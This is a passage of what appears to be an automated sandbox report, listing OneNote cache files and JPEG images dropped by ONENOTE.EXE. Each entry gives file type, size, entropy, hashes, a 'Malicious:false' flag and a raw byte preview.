                                                                                                                                                                                                              SSDEEP:384:znP0FMN+88RgycRtPPX3lsWJdTZaaO607Lmij+uZvs9ONnuQVNgaq9UVBs7:znP0GN+RaycRlPX3lsWJdTZaaO60vmio
                                                                                                                                                                                                              MD5:650776E675645D8B1014E467EE7CB896
                                                                                                                                                                                                              SHA1:6BC0EFD6878EC41C4D112E6310C5168573DACFCA
                                                                                                                                                                                                              SHA-256:3BDB263C4126EF6E7544AF1C7D6EEC66A0BC2FFEA925BD2E0A844F7C15D089E1
                                                                                                                                                                                                              SHA-512:CF4A9D76004223A33D4116040441793D589E0C58731A8F88016D14C4D13ACCEC41BC0737CB80640320F74A6B56CE5ACAAFE994FC51E7DCEE7CDA37AD0C1A4B61
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...........v........@..X ...I..........>...T.......v.......PH..X ...H..................................................................................>...`.......v........H..X ...I...............I.......I.qk..B.....LZ............<...7z.JqcJ.....<...7z.JqcJO.....A6ME.S./..D....A6..I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'.............Qh.X.*...`.........N...^...............+.>..zA.....1W.................................................I.qk..B.....LZ............Qh.X.*...`...................................................................................................A6(.W...A6(._...A6 .....A6$.....A6 .....A6$.....A6 ...".A6(.~...............;........4...4...4............'...D.....z...,4. .......$>........4....7..........................3.........................z...y.. x.. ........ ..$...$........&..$!..7!..7.........*...o.e.L.o.c.I.D...o.e.L.o.c
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22203
                                                                                                                                                                                                              Entropy (8bit):6.977175130747846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                              MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                              SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                              SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                              SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):3.9969532594177934
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:UsQpa99YlNBg7pzeHWVNwwXgNIRR/EW5:pQpa/YlNWIWVNwagNgR/T
                                                                                                                                                                                                              MD5:20BC526CF7EE06A9B49D2F22216AEEF5
                                                                                                                                                                                                              SHA1:01650DEB31387941B18BCC844E10348337B3B25D
                                                                                                                                                                                                              SHA-256:5129CC3A1E551EC498CEB44D1D8EEB981993DE8DE0B94BAFD7A4089B6E761170
                                                                                                                                                                                                              SHA-512:46D26CFB9038A95DFC3320809F53CB61AD90E7AAC57A9DE4A7BF7D9111C54D838A9F715B42B2C0E4359F1040EE28AE5F776D53B74580DD97916DABA57BB81326
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>.......j...v...6............................I.......I.qk..B.....LZ.cl.)....clnm.....l..oU..clnm.....l..oU..cl..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................;@8...7.....N...^................:/.../A....@&bd...........@&....................................I.qk..B.....LZ....................;@8...7.................;@8...7...........cl......cl......cl..........................................clj.....clT)Z...cl..2...cl......clH.....cl..J.$.cl$.z.%.cl..0...............;........4...4...4..............z...........................;...!..7......................C.a.l.i.b.r.i.................z.......R...................!..7............S.y.m.b.o.l...................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52945
                                                                                                                                                                                                              Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                              MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                              SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                              SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                              SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.5027758512164513
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:LsLK7b8EH1x5VSG9QxXvA3OIw/D14l1BCXvxjXHRd8CURta9/5u:wzEH1x5VS2QxXoe/wWXvxbxdnURtis
                                                                                                                                                                                                              MD5:ABED842B41E20542F7AEA29335C8E6BF
                                                                                                                                                                                                              SHA1:3430F1FF50F00634D00C7B628312803E246B0DC6
                                                                                                                                                                                                              SHA-256:E5253BBA5971AB85C283E04763EFA0B0C159ECB93D24DAA0B36171B01B878714
                                                                                                                                                                                                              SHA-512:B0A17D7B0E907789559A02B88099159FE14E2B758B95A5D217925AA43CF908A8573DB9E87A95C74F131DDE8147A43A0CC5A928F2E12D6CB32B23A1356D0BB9CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>.......0...v................................I.......I.qk..B.....LZ....9.........Q...}..<[[......Q...}..<[[.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............./6.....;...........N...^....................`VD...o...\........"...4...............................b....I.qk..B.....LZ............/6.....;.............../6.....;...............................................................................j.......T.x...............4.....H....... .......$.........j...............;........4...4...4................:...j.....z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0..............:...L.....z...y.. x.. ...........$........!..7!.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25622
                                                                                                                                                                                                              Entropy (8bit):7.058784902089801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                              MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                              SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                              SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                              SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):3.2566598684669295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:dgIRyeOiz8zn82yU83z9zPRSt+CM70ssF9sjnI:dgIRycz8zn82yx3z9zPRu+CM70sE9sjI
                                                                                                                                                                                                              MD5:215F24DFB1189DD3B0F0AAB42E487573
                                                                                                                                                                                                              SHA1:F43C13FEBCB9800630EE9B237F25A2F7A711B955
                                                                                                                                                                                                              SHA-256:97D649253B6F3FCFD9E67D4A4DAFF71D1AB35B18EABA419115738B1DE1F626AD
                                                                                                                                                                                                              SHA-512:F72DB88EED01793B0FAC022FF3894504350E587FD6FB71796600FF5C2FB460EA9D88C5BC530E6172D82692C7BF7E26F7B79DCD5A4342290B9327C152F3F13F84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......r...v.......p ..X/..2...>.......j...v...6....-..x........LZ.............1L..L.@..F.p.|..........1L..L.@..F.p.|.....2...>.......r...v........-..x...........v........-..x....................I.......I.qk..B.....LZ....T..........2....EF........2....EF......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................!)."..E.[......N...^................1L..L.@..F.p.|.........4................1L..L.@..F.p.|..........I.qk..B.....LZ................!)."..E.[..................................................................................................j.......T)y...............4.......a.......l.....$.N.$...$.................;........4...4...4............'...%.........z...,4. ...........$>........4.@!..7..............................D..n4..o4..p4...4. ..u-...............................;........4...4...4............................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15740
                                                                                                                                                                                                              Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                              MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                              SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                              SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                              SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.7837172735185467
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:4sUcqvu4XTNF9tTvMj26mC3sKGL0rmlekqUXuGtSZRtIIyV2xF:tSRXTNntTvMoKI0rmttu2SZRtNycxF
                                                                                                                                                                                                              MD5:7E1AB552DF3DC293B619DF26230B52BA
                                                                                                                                                                                                              SHA1:E19926E735A13D317B2449618A9C91010AB1E0F3
                                                                                                                                                                                                              SHA-256:DC96560AD9AFCFC765016C1D836EAB01166495C9233CD4BFCA2B5E3E8876B955
                                                                                                                                                                                                              SHA-512:370D0BB35A657930A6D14866A1F581EA9F3136E0DC791C647C41A2F03B52DE0193D2A7C8D2D1DF6665C88FCF7E9C27827AE586661FEE69F1BC2000052E81A15F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...h.......v........ .. !..2...>...........v.......@................................................................................................................................................I.......I.qk..B.....LZ....9.........%z..#s .......%z..#s ......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............:+S.a..=..........N...^....................G.E.f.:...............>....................................I.qk..B.....LZ.............:+S.a..=......................................................................................................j.......T.~..............P.....H....... .......$........n...............;........4...4...4................:...j.....z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0..............:...L.....z...y.. x.. ...........$........!..7!.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55804
                                                                                                                                                                                                              Entropy (8bit):7.433623355028275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                              MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                              SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                              SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                              SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.669180434301248
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ooWsjLHhWqJQrcc2730J2I3Bv8wXg26kZ2K0o7RtNA2WVj3IxU3/9az3B2BC2sq0:LjdWqKrcX0LB7akNRtNWV7Ix+1arZR9m
                                                                                                                                                                                                              MD5:35E6CA85E47D65CC2C7F0B8FB09005A1
                                                                                                                                                                                                              SHA1:7E9F321F7A1CE3485E0C93D44707897DDC264AF4
                                                                                                                                                                                                              SHA-256:0976C98EF59AE773BD57DA337EFB5A42C2249E8CDCB836F04D8B5EE51AD50604
                                                                                                                                                                                                              SHA-512:404F0C94DF294D9E9EF6EF01B1F27544A9CA3D10E8CB3403005F8B7F38602F617BF8D55FAFEB765C6107FC97ADC3A4E906290E53CB071AFBC86A813B32F5310B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:4...>.......N...v..."...( ...+..4...>...........v...j...@....*...........................................................................................................................................I.......I.qk..B.....LZ.L.......L.R.:..0.*"|_...L.R.:..0.*"|_.v.L...I.qk..B.....LZ.I..{E...n.E.b|...{.{E............I.......I...................................................I.t.....I................................................................4..'...'..............8`&...G..]EuB..........f...Z.............1.F`.H..J.........N...^........................................I.qk..B.....LZ..............1.F`.H..J.......................................L.......L.......L..........................................{E...c..{E.(.Z..{E.(.....L.j.....L.T.u...L.......L...2...L...m.......z.......R...................!..7............W.i.n.g.d.i.n.g.s......333..................;........4...4...4..............L.:.L.L.L.Y.L.K.L...z...y.. x.. ........ ..$...$........!..7!..7.........*...o.e.L.o.c.I.D...o.e.L
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41893
                                                                                                                                                                                                              Entropy (8bit):7.52654558351485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                              MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                              SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                              SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                              SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.599641655874727
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:/sb9lfQdUL4kaMlDAuKqK5X7WEXpB/hX3Rt2SFNcAqU9Dya9zjEY1vr1F9dy/xDZ:0rfGUL4TMpAuKqM7lLZX3RtBN9q4DZzM
                                                                                                                                                                                                              MD5:C227438459802741411AAE062435615B
                                                                                                                                                                                                              SHA1:3C6C811F2B8A40E08FF81BF1438D0C2B55FE48CB
                                                                                                                                                                                                              SHA-256:C4253A70E24CA4A93F651AD5ABF6CE8A45629AFCE8F8D17BB7077DD03889EE27
                                                                                                                                                                                                              SHA-512:661224138DED18748083C4DADECA5F017C3550571BBEA1834433D8E03855E46E4C3793D28D085D59DAAD50C13540FBB1CBA29A09986E432FF4D156B0845D6DB6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......<...v.......` ..`+..2...>...........v...X...@...P*..........................................................................................................................................~"..G...~"...q......|.dN.I.......I.qk..B.....LZ~"...q......|.dN~"...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............I....O...B.;&.......N...^...............|S2.W..@.&B.S...............j....................................I.qk..B.....LZ............I....O...B.;&....................................~"......~"......~"..........................................~".j....~".T)z..~"...`..~"......~"...D..~"...a..~".$.6.$~".$.................;........4...4...4.............~".;~".Y~".X~"...z...y.. x.. ........ ..$...$........D...E.......!..7!..7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9.........$....................z.......R.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14177
                                                                                                                                                                                                              Entropy (8bit):5.705782002886174
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                              MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                              SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                              SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                              SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                              Entropy (8bit):4.634703909003135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Rodd/r2z8gXNiEBP+yqEjrD+kcx4mtwjfPWqPor78AvB0ydNz/V/D8LxxzyxELtr:+KNT+ayfdAURdFeMlpxf53F
                                                                                                                                                                                                              MD5:FBD25DE7E59E2285516DF3209351B6A9
                                                                                                                                                                                                              SHA1:203078C192F833AB60A922E25C23B858E1624A6C
                                                                                                                                                                                                              SHA-256:3FD2147B5E9B17B842D48BEFB224D3EAD6476142A4A7973408E8CC3990676E65
                                                                                                                                                                                                              SHA-512:D404F41688A898A84E2791C5DBCB5BE377344211EB243D7B6F93F34064B64E256604A534648970A092FAA308806BEFF367E458CE21765059FE9C10FE5C0D85F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:j.......&&.......%..>&....... ..0@..0`..........j........%.......%..Z&..X.... ..0@..0`.................................................................j........%.......%........... ..0@..0`..8......./......./..n...F.d!.H.i)............EmA.2B..d.~Z......B...M...@.....S...q..p....e.S...c....v....r....c......................................................................./..T.......T$5..\..T.y....T$...%..T....ec.T......)T....H.0T.............0...........e....4........................~.K$.hcM..~.........(...`E......(...$...B.i.n.o.c.u.l.a.r.s. .C.o.r.n.e.r...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...0...0.0.0.8...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e.........\.......\......C.....[.%.......%......G.X...Wg.2...........`...,...L...n...B"..........\..........%...ec................0...........e....4.........................u.4..G..p.".a.....(...P.u.....(..."...B.l.u.e. .M.i.s.t. .M.a.r.g.i.n...j...P.a.g.e.L.o.c.I.D...L.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.384433811305364
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:LwsLp7LL2zFHYt4DE8onLX1X4XEL9muTcVlrdhSrgV2ktXN1ON9iz6FOylYbq:LwspL2zF4kE8SLXa0L9VTUlRAgji
                                                                                                                                                                                                              MD5:B1CB964764DC49265D1868A8BB436301
                                                                                                                                                                                                              SHA1:9D2FDEAA48BF076D99E9A666D2F0C8E154F01CA1
                                                                                                                                                                                                              SHA-256:08B2EEC718F348212AC99C1C891D54239E22FF8256FCD8A4A25E73A9F14AAB5C
